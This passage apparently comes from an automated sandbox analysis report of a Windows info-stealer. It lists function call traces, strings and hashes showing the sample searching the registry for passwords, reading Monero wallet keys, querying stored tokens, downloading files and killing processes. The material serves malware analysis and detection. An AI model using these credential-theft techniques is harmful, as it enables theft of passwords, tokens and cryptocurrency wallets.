                                      • lstrcat.KERNEL32(00000000,00D5192C), ref: 00D37666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00D376A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 00D376BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00D376EF
                                      • lstrcat.KERNEL32(00000000,00D51934), ref: 00D37700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00D37733
                                      • lstrcat.KERNEL32(00000000,00D51938), ref: 00D3774D
                                      • task.LIBCPMTD ref: 00D3775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID: :
                                      • API String ID: 2677904052-3653984579
                                      • Opcode ID: a37c17e4dca055e40bee07320c3b491a4bea2f59fb7282b94566d5510da0047c
                                      • Instruction ID: 90b8134ba4ba2fcf049d066af494664fed258f05a2eadffb42f34ca7a0a095b5
                                      • Opcode Fuzzy Hash: a37c17e4dca055e40bee07320c3b491a4bea2f59fb7282b94566d5510da0047c
                                      • Instruction Fuzzy Hash: 5E315EB5904208DBDB19EBA4DCA9DFE7379EB44301F104208F59263294DA3DA94ADB70
                                      Function 00D48290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0167E4D0,00000000,?,00D50E14,00000000,?,00000000), ref: 00D482C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D482C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00D482E8
                                      • __aulldiv.LIBCMT ref: 00D48302
                                      • __aulldiv.LIBCMT ref: 00D48310
                                      • wsprintfA.USER32 ref: 00D4833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: cea2b8596bff6f4dd0000a3908bfbcba0f1583f57d4d6ff90557a386de7d8f2f
                                      • Instruction ID: 1120b35ab6dcbac3fb6fda955a178c94e9185208b1cdcc38d39e3f12fdfc29ed
                                      • Opcode Fuzzy Hash: cea2b8596bff6f4dd0000a3908bfbcba0f1583f57d4d6ff90557a386de7d8f2f
                                      • Instruction Fuzzy Hash: EF2108B1E44208ABDB10DFD4CC4AFAEB7B9FB44B10F104519F655BB280C77969048BB5
                                      Function 00D360F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                        • Part of subcall function 00D34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                      • InternetOpenA.WININET(00D50DFB,00000001,00000000,00000000,00000000), ref: 00D3615F
                                      • StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D36197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00D361DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D36203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00D3622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D3625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00D36299
                                      • InternetCloseHandle.WININET(?), ref: 00D362A3
                                      • InternetCloseHandle.WININET(00000000), ref: 00D362B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 7b7a0fb6e5f1272beed3dedee509ef0957bb43edeb06ac165d6108cebd852cdb
                                      • Instruction ID: 0d05d6260759aa9d3c063870410121fd86a45a4a38cfc88385615f386de9a17b
                                      • Opcode Fuzzy Hash: 7b7a0fb6e5f1272beed3dedee509ef0957bb43edeb06ac165d6108cebd852cdb
                                      • Instruction Fuzzy Hash: 2E5163B1A40218ABDF20DF94CC45BEE7779EB44301F108098F645A71C1DB79AA89CFB9
                                      Function 00DB012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 00DB024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 00DB035B
                                      • CatchIt.LIBVCRUNTIME ref: 00DB03AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 00DB04C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: 161ff28a4308801ab01718fd6924be2dcab3fafe2874d8ace669dedcd0b663f1
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: F1B16971800209EFCF25DFA4C8859EFBBB5FF05310B1881AAE9166B212D735DA51CBB1
                                      Function 00D37330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D37411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D374B2
                                      • HeapFree.KERNEL32(00000000), ref: 00D374B9
                                      • task.LIBCPMTD ref: 00D375B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetask
                                      • String ID: Password
                                      • API String ID: 775622407-3434357891
                                      • Opcode ID: 8ed3db0f863e30e637bd8dac21e3be32a0278fb978fede8f8fbe2a1176758ff0
                                      • Instruction ID: 4d9696ec1e9bd095abd4268d05cf00f96d8a47c1f242c64f6e8ac0e672a370b2
                                      • Opcode Fuzzy Hash: 8ed3db0f863e30e637bd8dac21e3be32a0278fb978fede8f8fbe2a1176758ff0
                                      • Instruction Fuzzy Hash: 27610CB590425C9BDB25DB50CC55BDAB7B8FF48300F0481E9E689A6145EBB06BC9CFB0
                                      Function 00D3BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      • lstrlen.KERNEL32(00000000), ref: 00D3BC6F
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00D3BC9D
                                      • lstrlen.KERNEL32(00000000), ref: 00D3BD75
                                      • lstrlen.KERNEL32(00000000), ref: 00D3BD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: 613051cdee2e2f12f09cc1e284b6c1c74b3a1ac68c8e0ebc5b44879d19a3d248
                                      • Instruction ID: e6781a8c909453a4f51c74c54f78575e71cf2579937eadaa2206be49ebc22d8b
                                      • Opcode Fuzzy Hash: 613051cdee2e2f12f09cc1e284b6c1c74b3a1ac68c8e0ebc5b44879d19a3d248
                                      • Instruction Fuzzy Hash: 20B15E76950118ABEF14FFA8DCA6EEE7339EF54301F404569F50662092EF346A48CB72
                                      Function 00D46A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 01db7ccb0fb1af8384ec909d6b3fc8d53fce5f70e3885258adcf7ef0c7076fa4
                                      • Instruction ID: 2555797822ca4f058d32fa9167dbf183b93fcab5fa219e18b74c225db08ae71f
                                      • Opcode Fuzzy Hash: 01db7ccb0fb1af8384ec909d6b3fc8d53fce5f70e3885258adcf7ef0c7076fa4
                                      • Instruction Fuzzy Hash: B8F0A730908209EFD755DFE4E4097DCBB31EB05707F1141A5F6CA961C4C67EAA40DB62
                                      Function 00D408A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D49850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00D408DC,C:\ProgramData\chrome.dll), ref: 00D49871
                                      • StrCmpCA.SHLWAPI(00000000,01679078), ref: 00D40922
                                      • StrCmpCA.SHLWAPI(00000000,01679088), ref: 00D40B79
                                      • StrCmpCA.SHLWAPI(00000000,01678FD8), ref: 00D40A0C
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00D40C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 00D408CD
                                      • C:\ProgramData\chrome.dll, xrefs: 00D40C30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDelete
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 1958263904-663540502
                                      • Opcode ID: 4b4e5d33cf4b3bceaeb8c4ade5d253735ea483cfd9ede8c2d9f7b283f7acb767
                                      • Instruction ID: f88dade1239d32ca336d6227ac583f3a77d9333b532072e6a8dddfe452a22061
                                      • Opcode Fuzzy Hash: 4b4e5d33cf4b3bceaeb8c4ade5d253735ea483cfd9ede8c2d9f7b283f7acb767
                                      • Instruction Fuzzy Hash: ABA147717001099FCB28EF68D996EAD7776EF94300F10816DE90A9F255DA30DA09CBB2
                                      Function 00D39E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                      • wsprintfA.USER32 ref: 00D39E7F
                                      • lstrcat.KERNEL32(00000000,?), ref: 00D39F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00D39F17
                                      • lstrcat.KERNEL32(00000000,00D512D8), ref: 00D39F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00D39F7C
                                      • Sleep.KERNEL32(00001388), ref: 00D3A013
                                        • Part of subcall function 00D499A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D499C5
                                        • Part of subcall function 00D499A0: Process32First.KERNEL32(00D3A056,00000128), ref: 00D499D9
                                        • Part of subcall function 00D499A0: Process32Next.KERNEL32(00D3A056,00000128), ref: 00D499F2
                                        • Part of subcall function 00D499A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D49A4E
                                        • Part of subcall function 00D499A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00D49A6C
                                        • Part of subcall function 00D499A0: CloseHandle.KERNEL32(00000000), ref: 00D49A79
                                        • Part of subcall function 00D499A0: CloseHandle.KERNEL32(00D3A056), ref: 00D49A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
